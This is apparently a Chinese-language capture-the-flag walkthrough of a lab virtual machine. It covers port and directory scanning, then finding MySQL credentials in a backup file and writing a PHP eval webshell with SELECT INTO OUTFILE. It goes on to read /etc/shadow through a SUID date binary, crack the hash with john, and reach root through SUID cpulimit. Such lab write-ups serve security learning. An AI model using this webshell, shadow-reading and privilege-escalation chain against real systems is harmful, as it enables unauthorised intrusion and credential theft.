arp-scan --interface=eth0 192.168.1.0/24
nmap -sC -sV -p- -sT 192.168.1.251
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
sV: Probe open ports to determine service/version info
-sC: equivalent to --script=default
9000端口有个phpmyadmin
dirsearch -u http://192.168.1.251/ -e* -w /usr/share/dirb/wordlists/common.txt
扫描到一个mysql的备份文件
在里面发现mysql连接的用户名密码 vishal/hacksudo
成功进入数据库
首先执行 sql 语句查看是否设置了 secure_file_priv 选项
showvariableslike'%secure_file_priv%'
secure_file_priv值为空 可利用mysql写入webshell
select"<?php @eval($_POST[whoami]);?>"into outfile'/var/www/html/shell.php';
成功写入
使用蚁剑成功连接
反弹shell成功
尝试SUID提权
find / -perm -u=s -type f 2>/dev/null
有个/usr/bin/date 尝试提权,网上找找提权方式
/usr/bin/date命令可以用来查看当前系统时间,同时date也可以通过-f参数来读取文件。所以当date有suid位时,可以用来读取root权限的文件,比如/etc/shadow
尝试提权
反弹shell界面操作失败,在蚁剑终端操作成功,玄学
发现一个hacksudo用户和他的哈希加密密码
使用john暴力破解用户的哈希
hash.txt
$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
尝试ssh登录成功
再次尝试SUID提权
在 gtfobins =>https://gtfobins.github.io/#cpulimit 上也找到他的提权方式
尝试提权成功
/home/hacksudo/Downloads/cpulimit -l 100 -f -- /bin/sh -p
拿到flag
